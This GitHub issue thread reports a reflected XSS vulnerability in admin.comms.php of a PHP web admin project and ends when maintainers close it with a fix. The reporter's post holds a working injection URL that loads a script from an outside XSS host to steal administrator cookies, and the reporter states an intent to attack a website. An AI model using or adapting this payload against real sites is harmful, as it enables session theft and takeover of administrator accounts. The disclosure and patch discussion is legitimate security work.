Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

XSS vulnerability in admin.comms.php #253

Closed
l33cy opened this issue Apr 13, 2017 · 9 comments
Closed

XSS vulnerability in admin.comms.php #253

l33cy opened this issue Apr 13, 2017 · 9 comments

Comments

@l33cy
Copy link

l33cy commented Apr 13, 2017

There is a reflective XSS vulnerability in the 21 line of the admin.comms.php file.
Hackers can exploit this vulnerability to obtain an administrator's cookies.

http://domain/index.php?p=admin&c=comms&rebanid=1123123123123123123231223");</script><script src=http://xsspt.com/phssz8?1492070578></script><script>alert("a
Effect in browser:
image
image
code:
image

Do not print the user input data directly on the page. Please.
My English is so poor.
Could you help me apply for a CVE number for this vulnerability?
I need it.
Thank you very much。

  • Version used: 1.5.4.7
  • PHP and MySQL version: php7.0.12 mysql5
  • Operating System and version: windows10
  • Link to your project:localhost
@good-live
Copy link

good-live commented Apr 13, 2017

I don't really see how you can abuse this to get an administrators cookie?
Also modern browsers (Tried with chrome) are blocking it.

@l33cy
Copy link
Author

l33cy commented Apr 13, 2017

Try Firefox

@l33cy
Copy link
Author

l33cy commented Apr 13, 2017

The use of a certain limit, but does not affect the vulnerability of the harm. I'm trying to exploit this vulnerability to attack a website.

@K1N62
Copy link
Contributor

K1N62 commented Apr 16, 2017

If a user opens the link in their browser the script will be executed, this is how your cookie is stolen. However this link does more than just showing an alert for demonstration purpose, this link actually downloads a script and runs it! DO NOT CLICK THE LINK

@l33cy
Copy link
Author

l33cy commented Apr 17, 2017

Please apply for CVE number on this site. https://cveform.mitre.org/

@eNNercY1337
Copy link

very useful for such a small software @l33cy rather show them the fix for it ;)

@sarabveer
Copy link
Contributor

@l33cy we have had many security holes what were patched and never were on CVE

@Groruk
Copy link
Member

Groruk commented Apr 17, 2017

Applying for a CVE for such an exploit in a small open source project would take longer than just fixing it as the fix would just be the filtering of every $_GET, $_POST and $_SERVER variable. Consider it patched by tomorrow.

@Groruk
Copy link
Member

Groruk commented Apr 17, 2017

Fixed with e63701e

@Groruk Groruk closed this as completed Apr 17, 2017
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

6 participants